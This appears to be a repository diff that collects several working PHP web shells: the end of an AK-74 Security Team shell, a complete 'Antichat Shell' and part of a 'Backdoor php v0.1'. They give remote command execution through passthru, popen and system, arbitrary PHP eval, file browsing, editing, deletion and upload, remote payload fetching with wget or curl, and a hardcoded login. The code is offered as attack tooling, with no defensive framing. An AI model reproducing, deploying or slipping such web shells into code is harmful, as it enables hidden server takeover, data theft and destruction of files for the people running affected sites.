<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
|
||||
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
|
||||
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
|
||||
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function execute()
|
||||
{
|
||||
echo "<hr>";
|
||||
echo "<pre>";
|
||||
eval(stripslashes($_POST['phpcode']));
|
||||
echo "</pre>";
|
||||
echo "<hr>";
|
||||
}
|
||||
|
||||
function exesysform()
|
||||
{
|
||||
$res = '';
|
||||
$res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
|
||||
<tr>
|
||||
<td align="center" colspan=7>
|
||||
<b><font color=#83000>Execute system commands!</font></b>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=7 align="center">
|
||||
<table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
|
||||
$res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
|
||||
<table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
|
||||
<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
|
||||
return $res;
|
||||
}
|
||||
|
||||
function exesys()
|
||||
{
|
||||
echo "<hr>";
|
||||
echo "<pre>";
|
||||
$result = passthru($_POST['cmmd']);
|
||||
echo "</pre>";
|
||||
echo "<hr>";
|
||||
}
|
||||
|
||||
function editfile($file)
|
||||
{
|
||||
if (!empty($_POST['rename'])) {
|
||||
rename ($_POST['file'], $_POST['rename']);
|
||||
}
|
||||
$fp = fopen($_POST['rename'],'w');
|
||||
if (!$fp)
|
||||
return 0;
|
||||
fwrite($fp, stripslashes($_POST['filecontent']));
|
||||
fclose($fp);
|
||||
return 1;
|
||||
}
|
||||
|
||||
function chmodfile($file)
|
||||
{
|
||||
$res = 0;
|
||||
switch ($_POST['perms0'])
|
||||
{
|
||||
case 's':
|
||||
$res = $res | 0xC000;
|
||||
break;
|
||||
case 'l':
|
||||
$res = $res | 0xA000;
|
||||
break;
|
||||
case '-':
|
||||
$res = $res | 0x8000;
|
||||
break;
|
||||
case 'b':
|
||||
$res = $res | 0x6000;
|
||||
break;
|
||||
case 'd':
|
||||
$res = $res | 0x4000;
|
||||
break;
|
||||
case 'c':
|
||||
$res = $res | 0x2000;
|
||||
break;
|
||||
case 'p':
|
||||
$res = $res | 0x1000;
|
||||
break;
|
||||
case 'u':
|
||||
|
||||
break;
|
||||
}
|
||||
if (isset($_POST['perms1']))
|
||||
$res = $res | 0x0100;
|
||||
if (isset($_POST['perms2']))
|
||||
$res = $res | 0x0080;
|
||||
if (isset($_POST['perms3']))
|
||||
$res = $res | 0x0040;
|
||||
|
||||
if (isset($_POST['perms4']))
|
||||
$res = $res | 0x0020;
|
||||
if (isset($_POST['perms5']))
|
||||
$res = $res | 0x0010;
|
||||
if (isset($_POST['perms6']))
|
||||
$res = $res | 0x0008;
|
||||
|
||||
if (isset($_POST['perms7']))
|
||||
$res = $res | 0x0004;
|
||||
if (isset($_POST['perms8']))
|
||||
$res = $res | 0x0002;
|
||||
if (isset($_POST['perms9']))
|
||||
$res = $res | 0x0001;
|
||||
echo substr(sprintf('%o', $res), -4);
|
||||
return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
|
||||
|
||||
}
|
||||
|
||||
function downloadfile($file)
|
||||
{
|
||||
header ("Content-Type: application/octet-stream");
|
||||
header ("Content-Length: " . filesize($file));
|
||||
header ("Content-Disposition: attachment; filename=$file");
|
||||
readfile($file);
|
||||
die();
|
||||
}
|
||||
|
||||
function createdir()
|
||||
{
|
||||
if (!empty($_POST['dircreate']))
|
||||
if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
|
||||
return 'Äèðåêòîðèÿ ñîçäàíà!';
|
||||
|
||||
return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
|
||||
}
|
||||
|
||||
function createfile()
|
||||
{
|
||||
if (!empty($_POST['filecreate']))
|
||||
{
|
||||
if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
|
||||
return 'Ôàéë óæå ñóùåñòâóåò';
|
||||
$fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
|
||||
if ($fp)
|
||||
{
|
||||
fclose($fp);
|
||||
return 'Ôàéë ñîçäàí!';
|
||||
}
|
||||
}
|
||||
|
||||
return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
|
||||
}
|
||||
|
||||
function uploadfile()
|
||||
{
|
||||
if ($_FILES['filename']['error'] != 0)
|
||||
return '121212';
|
||||
$_POST['filename2'] = trim($_POST['filename2']);
|
||||
if (empty($_POST['filename2']))
|
||||
$_POST['filename2'] = $_FILES['filename']['name'];
|
||||
if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
|
||||
if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
|
||||
return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
|
||||
return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
|
||||
}
|
||||
|
||||
}
|
||||
$shell = new shell();
|
||||
$timestart = $shell->getmicrotime();
|
||||
$content = '';
|
||||
if (!isset($_SESSION['currentdir']))
|
||||
$_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
|
||||
if (isset($_GET['dir']))
|
||||
{
|
||||
if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
|
||||
$_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
|
||||
Header("Location: $xshell?act=filemanager");
|
||||
}
|
||||
|
||||
$_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
|
||||
if (substr($_SESSION['currentdir'],-1,1) == '/')
|
||||
$_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
|
||||
|
||||
switch ($_POST['action'])
|
||||
{
|
||||
case 'chmod':
|
||||
if($shell->chmodfile($_POST['file']))
|
||||
$content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
|
||||
break;
|
||||
|
||||
case 'editfile':
|
||||
if ($shell->editfile($_POST['file']))
|
||||
$content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
|
||||
break;
|
||||
|
||||
case 'execute':
|
||||
$shell->execute();
|
||||
break;
|
||||
|
||||
case 'exesys':
|
||||
$shell->exesys();
|
||||
break;
|
||||
|
||||
case 'mkdir':
|
||||
$content .= $shell->createdir();
|
||||
break;
|
||||
|
||||
case 'createfile':
|
||||
$content .= $shell->createfile();
|
||||
break;
|
||||
|
||||
case 'uploadfile':
|
||||
$content .= $shell->uploadfile();
|
||||
break;
|
||||
}
|
||||
$content .= $shell->outputhead();
|
||||
$content .= $shell->outputmenu();
|
||||
|
||||
switch ($_GET['act'])
|
||||
{
|
||||
case 'edit':
|
||||
$content .= $shell->editfileform($_GET['file']);
|
||||
break;
|
||||
|
||||
case 'chmod':
|
||||
$content .= $shell->chmodform($_GET['file']);
|
||||
break;
|
||||
|
||||
case 'down':
|
||||
$content .= $shell->downloadfile($_GET['file']);
|
||||
break;
|
||||
|
||||
case 'filemanager':
|
||||
if ($_GET['act2'] == 'del')
|
||||
$content .= $shell->removefile();
|
||||
$content .= $shell->outputfilemanager();
|
||||
if ($_GET['act3'] == 'del')
|
||||
$content .= $shell->removedir();
|
||||
break;
|
||||
|
||||
case 'phpinfo':
|
||||
phpinfo();
|
||||
die();
|
||||
break;
|
||||
|
||||
case 'info':
|
||||
$content .= $shell->outputinfo();
|
||||
break;
|
||||
|
||||
case 'execute':
|
||||
$content .= $shell->executeform();
|
||||
break;
|
||||
|
||||
case 'exesys':
|
||||
$content .= $shell->exesysform();
|
||||
break;
|
||||
}
|
||||
|
||||
$content .= $shell->outputdown();
|
||||
|
||||
echo $content;
|
||||
echo '<center>Âðåìÿ ãåíåðàöèè: '.($shell->getmicrotime()-$timestart).'</center>';
|
||||
?>
|
366
xakep-shells/PHP/antichat.php.php.txt
Normal file
366
xakep-shells/PHP/antichat.php.php.txt
Normal file
|
@ -0,0 +1,366 @@
|
|||
<?php
|
||||
session_start();
|
||||
error_reporting(0);
|
||||
set_time_limit(9999999);
|
||||
$login='antichat';
|
||||
$password='antichat';
|
||||
$auth=1;
|
||||
$version='version 1.5 by Grinay';
|
||||
$msgnotice='';
|
||||
$style='<STYLE>
|
||||
BODY{
|
||||
background-color: #2B2F34;
|
||||
color: #C1C1C7;
|
||||
font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
|
||||
MARGIN-TOP: 0px;
|
||||
MARGIN-BOTTOM: 0px;
|
||||
MARGIN-LEFT: 0px;
|
||||
MARGIN-RIGHT: 0px;
|
||||
margin:0;
|
||||
padding:0;
|
||||
scrollbar-face-color: #336600;
|
||||
scrollbar-shadow-color: #333333;
|
||||
scrollbar-highlight-color: #333333;
|
||||
scrollbar-3dlight-color: #333333;
|
||||
scrollbar-darkshadow-color: #333333;
|
||||
scrollbar-track-color: #333333;
|
||||
scrollbar-arrow-color: #333333;
|
||||
}
|
||||
input{
|
||||
background-color: #336600;
|
||||
font-size: 8pt;
|
||||
color: #FFFFFF;
|
||||
font-family: Tahoma;
|
||||
border: 1 solid #666666;
|
||||
}
|
||||
select{
|
||||
background-color: #336600;
|
||||
font-size: 8pt;
|
||||
color: #FFFFFF;
|
||||
font-family: Tahoma;
|
||||
border: 1 solid #666666;
|
||||
}
|
||||
textarea{
|
||||
background-color: #333333;
|
||||
font-size: 8pt;
|
||||
color: #FFFFFF;
|
||||
font-family: Tahoma;
|
||||
border: 1 solid #666666;
|
||||
}
|
||||
a:link{
|
||||
|
||||
color: #B9B9BD;
|
||||
text-decoration: none;
|
||||
font-size: 8pt;
|
||||
}
|
||||
a:visited{
|
||||
color: #B9B9BD;
|
||||
text-decoration: none;
|
||||
font-size: 8pt;
|
||||
}
|
||||
a:hover, a:active{
|
||||
width: 100%;
|
||||
background-color: #A8A8AD;
|
||||
|
||||
|
||||
color: #E7E7EB;
|
||||
text-decoration: none;
|
||||
font-size: 8pt;
|
||||
}
|
||||
td, th, p, li{
|
||||
font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
|
||||
border-color:black;
|
||||
}
|
||||
</style>';
|
||||
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
|
||||
$footer='</body></html>';
|
||||
|
||||
//error parser
|
||||
$filext="File already exists.";
|
||||
$uploadok="File was successfully uploaded.";
|
||||
$dircrt="Dir is created.";
|
||||
$dircrterr="Don't create dir.";
|
||||
$dirnf="Dir not found.";
|
||||
$empty="Directory not empty or access denide.";
|
||||
$deletefileok="File deleted";
|
||||
$deletedirok="Dir deleted";
|
||||
//end error parser
|
||||
|
||||
//auth
|
||||
if(@$_POST['action']=="exit")unset($_SESSION['an']);
|
||||
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
|
||||
if(@$_SESSION['an']==0){
|
||||
echo $header;
|
||||
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
|
||||
echo $footer;
|
||||
exit;}
|
||||
//end auth
|
||||
|
||||
function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
|
||||
|
||||
|
||||
|
||||
if($_SESSION['action']=="")$_SESSION['action']="viewer";
|
||||
if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
|
||||
if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
|
||||
|
||||
$dir=chdir($dir);
|
||||
$dir=getcwd()."/";
|
||||
$dir=str_replace("\\","/",$dir);
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
//crdir
|
||||
|
||||
|
||||
if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
|
||||
|
||||
//Current type OS
|
||||
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
//downloader
|
||||
if($action=="download"){
|
||||
header('Content-Length:'.filesize($file).'');
|
||||
header('Content-Type: application/octet-stream');
|
||||
header('Content-Disposition: attachment; filename="'.$file.'"');
|
||||
readfile($file);
|
||||
}
|
||||
//end downloader
|
||||
|
||||
//delete file
|
||||
if($action=="delete"){
|
||||
if(unlink($file)) $msgnotice.=$deletefileok;
|
||||
}
|
||||
//end delete
|
||||
|
||||
//delete dir
|
||||
if($action=="deletedir"){
|
||||
if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
|
||||
|
||||
}
|
||||
//end delete
|
||||
?>
|
||||
|
||||
<? echo $header;?>
|
||||
<!--content-->
|
||||
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
|
||||
<table><tr>
|
||||
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
|
||||
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
|
||||
<td><a href="#" onclick="history.back();"> <-back |</a></td>
|
||||
<td><a href="#" onclick="history.forward();"> forward->|</a></td>
|
||||
|
||||
</tr></table></td></tr></table><br>
|
||||
<form name='reqs' method='POST'>
|
||||
<input name='action' type='hidden' value=''>
|
||||
<input name='dir' type='hidden' value=''>
|
||||
<input name='file' type='hidden' value=''>
|
||||
</form>
|
||||
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
|
||||
<tr><td width="100%" valign="top">
|
||||
<!--end one content-->
|
||||
<?php if(@$msgnotice!="") echo $msgnotice;?>
|
||||
<?
|
||||
|
||||
//shell
|
||||
function shell($cmd){
|
||||
if (!empty($cmd)){
|
||||
$fp = popen($cmd,"r");
|
||||
{
|
||||
$result = "";
|
||||
while(!feof($fp)){$result.=fread($fp,1024);}
|
||||
pclose($fp);
|
||||
}
|
||||
$ret = $result;
|
||||
$ret = convert_cyr_string($ret,"d","w");
|
||||
}
|
||||
return $ret;}
|
||||
|
||||
if($action=="shell"){
|
||||
echo "<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"shell\">
|
||||
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
|
||||
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
|
||||
<input type=\"submit\" value=\"execute\"></form>";}
|
||||
//end shell
|
||||
|
||||
|
||||
//viewer FS
|
||||
function perms($file)
|
||||
{
|
||||
$perms = fileperms($file);
|
||||
if (($perms & 0xC000) == 0xC000) {$info = 's';}
|
||||
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
|
||||
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
|
||||
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
|
||||
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
|
||||
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
|
||||
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
|
||||
else {$info = 'u';}
|
||||
$info .= (($perms & 0x0100) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0080) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0020) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0010) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
|
||||
$info .= (($perms & 0x0004) ? 'r' : '-');
|
||||
$info .= (($perms & 0x0002) ? 'w' : '-');
|
||||
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
|
||||
return $info;
|
||||
}
|
||||
|
||||
function view_size($size)
|
||||
{
|
||||
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
|
||||
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
|
||||
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
|
||||
else {$size = $size . " B";}
|
||||
return $size;
|
||||
}
|
||||
|
||||
function scandire($dir){
|
||||
|
||||
|
||||
|
||||
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
|
||||
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
|
||||
|
||||
if (is_dir($dir)) {
|
||||
if (@$dh = opendir($dir)) {
|
||||
while (($file = readdir($dh)) !== false) {
|
||||
if(filetype($dir . $file)=="dir") $dire[]=$file;
|
||||
if(filetype($dir . $file)=="file")$files[]=$file;
|
||||
}
|
||||
closedir($dh);
|
||||
@sort($dire);
|
||||
@sort($files);
|
||||
|
||||
|
||||
if ($GLOBALS['win']==1) {
|
||||
echo "<tr><td>Select drive:";
|
||||
for ($j=ord('C'); $j<=ord('Z'); $j++)
|
||||
if (@$dh = opendir(chr($j).":/"))
|
||||
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
|
||||
echo "</td></tr>";
|
||||
}
|
||||
echo "<tr><td>OS: ".@php_uname()."</td></tr>
|
||||
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
|
||||
for($i=0;$i<count($dire);$i++) {
|
||||
$link=$dir.$dire[$i];
|
||||
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
|
||||
}
|
||||
for($i=0;$i<count($files);$i++) {
|
||||
$linkfile=$dir.$files[$i];
|
||||
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
|
||||
<td>'.perms($linkfile).'</td>
|
||||
<td>
|
||||
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
|
||||
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
|
||||
<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
|
||||
</tr>';
|
||||
}
|
||||
echo "</table>";
|
||||
}}}
|
||||
|
||||
if($action=="viewer"){
|
||||
scandire($dir);
|
||||
}
|
||||
//end viewer FS
|
||||
|
||||
//editros
|
||||
if($action=="editor"){
|
||||
function writef($file,$data){
|
||||
$fp = fopen($file,"w+");
|
||||
fwrite($fp,$data);
|
||||
fclose($fp);
|
||||
}
|
||||
function readf($file){
|
||||
if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
|
||||
$contents = fread($le, filesize($file));
|
||||
fclose($le);}
|
||||
return htmlspecialchars($contents);
|
||||
}
|
||||
if(@$_POST['save'])writef($file,$_POST['data']);
|
||||
echo "<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"editor\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
|
||||
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
|
||||
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
|
||||
}
|
||||
//end editors
|
||||
|
||||
//upload
|
||||
if($action=="upload"){
|
||||
if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
|
||||
$form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
|
||||
if($GLOBALS['win']==1)echo $form_win;
|
||||
if($GLOBALS['win']==0){
|
||||
echo $form_win;
|
||||
echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
|
||||
<input type=submit name=upload value=Upload></form></td></tr>';
|
||||
}
|
||||
|
||||
if(@$_POST['uploadloc']){
|
||||
if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else
|
||||
$uploadfile = $dirupload."/".$_POST['filename'];
|
||||
|
||||
if(!file_exists($dirupload)){createdir($dirupload);}
|
||||
if(file_exists($uploadfile))echo $GLOBALS['filext'];
|
||||
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
|
||||
echo $GLOBALS['uploadok'];
|
||||
}
|
||||
|
||||
if(@$_POST['upload']){
|
||||
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
|
||||
switch($_POST['with'])
|
||||
{
|
||||
case wget:
|
||||
shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
|
||||
break;
|
||||
case fetch:
|
||||
shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
|
||||
break;
|
||||
case lynx:
|
||||
shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
|
||||
break;
|
||||
case links:
|
||||
shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
|
||||
break;
|
||||
case GET:
|
||||
shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
|
||||
break;
|
||||
case curl:
|
||||
shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
//end upload section
|
||||
|
||||
|
||||
if($action=="phpeval"){
|
||||
echo "
|
||||
<form method=\"POST\">
|
||||
<input type=\"hidden\" name=\"action\" value=\"phpheval\">
|
||||
<?php<br>
|
||||
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
|
||||
?><br>
|
||||
<input type=\"submit\" value=\"execute\"></form>";}
|
||||
if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
|
||||
?>
|
||||
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
|
||||
<? echo $footer;?>
|
181
xakep-shells/PHP/backdoor1.php.txt
Normal file
181
xakep-shells/PHP/backdoor1.php.txt
Normal file
|
@ -0,0 +1,181 @@
|
|||
<?
|
||||
/*
|
||||
Backdoor php v0.1
|
||||
Coded By Charlichaplin
|
||||
charlichaplin@gmail.com
|
||||
Join me: irc.fr.worldnet.net #s-c
|
||||
Greetz: My dog :)
|
||||
*/
|
||||
|
||||
class backdoor {
|
||||
var $pwd;
|
||||
var $rep;
|
||||
var $list = array();
|
||||
var $file;
|
||||
var $edit;
|
||||
var $fichier;
|
||||
var $del;
|
||||
var $shell;
|
||||
var $proxy;
|
||||
|
||||
function dir() {
|
||||
if(!empty($this->rep)) {
|
||||
$dir = opendir($this->rep);
|
||||
} else {
|
||||
$dir = opendir($this->pwd);
|
||||
}
|
||||
while($f = readdir($dir)) {
|
||||
if ($f !="." && $f != "..") {
|
||||
$this->list[] = $f;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function view() {
|
||||
|
||||
$this->file = htmlentities(highlight_file($this->file));
|
||||
}
|
||||
|
||||
function edit() {
|
||||
if(!is_writable($this->edit)) {
|
||||
echo "Ecriture impossible sur le fichier";
|
||||
} elseif(!file_exists($this->edit)) {
|
||||
echo "Le fichier n'existe pas ";
|
||||
} elseif(!$this->fichier) {
|
||||
$fp = fopen($this->edit,"r");
|
||||
$a = "";
|
||||
while(!feof($fp)) {
|
||||
$a .= fgets($fp,1024);
|
||||
}
|
||||
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
|
||||
} else {
|
||||
$fp = fopen($this->edit,"w+");
|
||||
fwrite($fp, $this->fichier);
|
||||
fclose($fp);
|
||||
echo "Le fichier a été modifié";
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
function del() {
|
||||
if(is_file($this->del)) {
|
||||
if(unlink($this->del)) {
|
||||
echo "Fichier supprimé";
|
||||
} else {
|
||||
echo "Vous n'avez pas les droits pour supprimer ce fichier";
|
||||
}
|
||||
} else {
|
||||
echo $this->del." n'est pas un fichier";
|
||||
}
|
||||
}
|
||||
|
||||
function shell() {
|
||||
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
|
||||
system($this->shell);
|
||||
}
|
||||
|
||||
function proxy($host,$page) {
|
||||
|
||||
$fp = fsockopen($host,80);
|
||||
if (!$fp) {
|
||||
echo "impossible d'etablir un connection avec l'host";
|
||||
} else {
|
||||
$header = "GET ".$page." HTTP/1.1\r\n";
|
||||
$header .= "Host: ".$host."\r\n";
|
||||
$header .= "Connection: close\r\n\r\n";
|
||||
fputs($fp,$header);
|
||||
while (!feof($fp)) {
|
||||
$line = fgets($fp,1024);
|
||||
echo $line;
|
||||
}
|
||||
fclose($fp);
|
||||
}
|
||||
}
|
||||
|
||||
function ccopy($cfichier,$cdestination) {
|
||||
if(!empty($cfichier) && !empty($cdestination)) {
|
||||
copy($cfichier, $cdestination);
|
||||
echo "Le fichier a été copié";
|
||||
} else {
|
||||
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
|
||||
}
|
||||
}
|
||||
}
|
||||
if(!empty($_REQUEST['rep'])) {
|
||||
$rep = $_REQUEST['rep']."/";
|
||||
}
|
||||
$pwd = $_SERVER['SCRIPT_FILENAME'];
|
||||
$pwd2 = explode("/",$pwd);
|
||||
$file = $_REQUEST['file'];
|
||||
$edit = $_REQUEST['edit'];
|
||||
$fichier = $_POST['fichier'];
|
||||
$del = $_REQUEST['del'];
|
||||
$shell = $_REQUEST['shell'];
|
||||
$proxy = $_REQUEST['proxy'];
|
||||
$copy = $_REQUEST['copy'];
|
||||
$cfichier = $_POST['cfichier'];
|
||||
$cdestination = $_POST['cdestination'];
|
||||
|
||||
$n = count($pwd2);
|
||||
$n = $n - 1;
|
||||
$pwd = "";
|
||||
for ($i = 0;$i != $n;$i = $i+1) {
|
||||
$pwd .= "/".$pwd2[$i];
|
||||
}
|
||||
|
||||
if($proxy) {
|
||||
$host2 = explode("/",$proxy);
|
||||
$n = count($host2);
|
||||
$host = $host2[2];
|
||||
$page = "";
|
||||
for ($i = 3;$i != $n;$i = $i+1) {
|
||||
$page .= "/".$host2[$i];
|
||||
}
|
||||
echo $page;
|
||||
}
|
||||
|
||||
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
|
||||
$backdoor = new backdoor();
|
||||
$backdoor->pwd = $pwd;
|
||||
$backdoor->rep = $rep;
|
||||
$backdoor->file = $file;
|
||||
$backdoor->edit = $edit;
|
||||
$backdoor->fichier = $fichier;
|
||||
$backdoor->del = $del;
|
||||
$backdoor->shell = $shell;
|
||||
